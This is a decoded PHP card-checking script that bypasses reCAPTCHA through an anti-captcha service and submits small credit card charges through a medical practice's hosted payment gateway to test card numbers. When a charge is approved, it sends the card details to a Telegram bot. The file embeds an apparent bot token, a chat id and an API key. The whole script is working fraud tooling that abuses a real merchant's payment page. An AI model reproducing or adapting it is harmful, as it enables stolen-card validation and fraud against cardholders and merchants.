/* Decoded by unphp.net */ ///////////////////////////////// CAPTCHA /////////////////////////////////// $api = new NoCaptchaProxyless(); $api->setVerboseMode(true); //your anti-captcha.com account key $api->setKey("58cd6e6c20f2ede648f290bc171b71d4"); //target website address $api->setWebsiteURL('https://hosted.transactionexpress.com/Transaction/Transaction/ValidateReCaptcha'); //recaptcha key from target website $api->setWebsiteKey("6LcPWysUAAAAAKALV4h0C3XI_L5TBdphZXTgR0WT"); //create task in API if (!$api->createTask()) { $api->debout("API v2 send failed - ".$api->getErrorMessage(), "red"); return false; } $taskId = $api->getTaskId(); //wait in a loop for max 300 seconds till task is solved if (!$api->waitForResult(20)) { "could not solve captcha "; } else { $gResponse = $api->getTaskSolution(); } /////////////////////////////// CAPTCHA /////////////////////////////////// $cus = order_id(6); $loc = trim(g(request('https://hosted.transactionexpress.com/Transaction/Transaction/Index', [ CURLOPT_POST => 1, CURLOPT_HTTPHEADER => [ 'Host: hosted.transactionexpress.com', 'Connection: keep-alive', 'Cache-Control: max-age=0', 'Origin: https://www.daleavenuepediatrics.com', 'Content-Type: application/x-www-form-urlencoded', 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'Referer: https://www.daleavenuepediatrics.com/', 'Accept-Language: en-US,en;q=0.9' ], CURLOPT_POSTFIELDS => 'HostedKey='.$hosted.'&Gateway_ID='.$gate.'&IndustryCode=2&Amount=&CustRefID='.$cus.'&RecurringType=N&RecurringAmount=&RURL=https%3A%2F%2Fwww.daleavenuepediatrics.com%2Fthank-you%2F&CURL=https%3A%2F%2Fwww.daleavenuepediatrics.com%2Fcancelled-payment%2F&AVSRequired=N&CVV2Required=N&EmailRequired=N&PostRspMsg=Y&Submit=Pay+Now' ]), ' 1, CURLOPT_POST => 1, CURLOPT_HTTPHEADER => [ 'Accept: */*', 'Accept-Language: en-US,en;q=0.9', 'Connection: keep-alive', 'Content-Type: application/x-www-form-urlencoded', 'Host: hosted.transactionexpress.com', 'Origin: https://hosted.transactionexpress.com' ], CURLOPT_POSTFIELDS => 'PaymetType=1' ]), 'name="__RequestVerificationToken" type="hidden" value="','"')); $site = request('https://hosted.transactionexpress.com/Transaction/Transaction/ValidateReCaptcha', [ CURLOPT_FOLLOWLOCATION => 1, CURLOPT_POST => 1, CURLOPT_HTTPHEADER => [ 'Accept: */*', 'Accept-Language: en-US,en;q=0.9', 'Connection: keep-alive', 'Content-Type: application/x-www-form-urlencoded', 'Host: hosted.transactionexpress.com', 'Origin: https://hosted.transactionexpress.com' ], CURLOPT_POSTFIELDS => 'captchaResponse='.$gResponse ]); if($site == 'True'){ $res = request('https://hosted.transactionexpress.com/Transaction/Transaction/CreditCardSale', [ CURLOPT_FOLLOWLOCATION => 1, CURLOPT_POST => 1, CURLOPT_HTTPHEADER => [ 'Accept: */*', 'Accept-Language: en-US,en;q=0.9', 'Connection: keep-alive', 'Content-Type: application/x-www-form-urlencoded', 'Host: hosted.transactionexpress.com', 'Origin: https://hosted.transactionexpress.com' ], CURLOPT_POSTFIELDS => '__RequestVerificationToken='.$req.'&txtAccountNumber=&AccountNumber='.$cc.'&ExpMonth='.$mm.'&ExpYear='.$yy.'&Amount=8.00&CVV2OrCID=&FullName=&AddessLine1='.idle_id(8).'&AddessLine2=&City=&State=&ZipOrPostalCode='.order_id(5).'&PhoneNumber=&txthdnPhNum=000-000-0000&EmailId=&hiddenCaptcha=&g-recaptcha-response=null&hdnCurl=https%3A%2F%2Fwww.daleavenuepediatrics.com%2Fcancelled-payment%2F&Errormessage=&PmtType=1&Amount=&AddessLine1=&AddessLine2=&CustomerReferenceId='.$cus.'&City=&State=&ZipOrPostalCode=&PhoneNumber=&WalletInfoModel.WalletDescription=&RecurringInfoModel.NumberofPayments=&IsRecurringAvailable=False&IsWalletAvailable=False&CVV2Required=False&AVSRequired=True&SwipeFullName=&Track1=&SwipeTransaction=&EmailRequired=False&FullNameRequired=False&SwipeAccountnumber=&SwipeExpmonth=&SwipeExpyear=&RequestModel.FullName=&OrginalFullName=&AddressLine1Required=True&ZipRequired=True' ]); $response = urldecode(g($res, '

','

')); $code = g($res, 'name="rspCode" type="hidden" value="','"'); if($code == "00"){ file_get_contents('https://api.telegram.org/bot1929533893:AAGSyLJQRFZhEMV_1sTAdiS41gyxNavSMtY/sendMessage?chat_id=967231846&text='.$_GET['check'].' [ CODE - '.$code.' | AVS - '.g($res, 'name="AVSRslt" type="hidden" value="','"').' | RESPONSE - APPROVED | RETRIES - '.$retry.' ]'); } }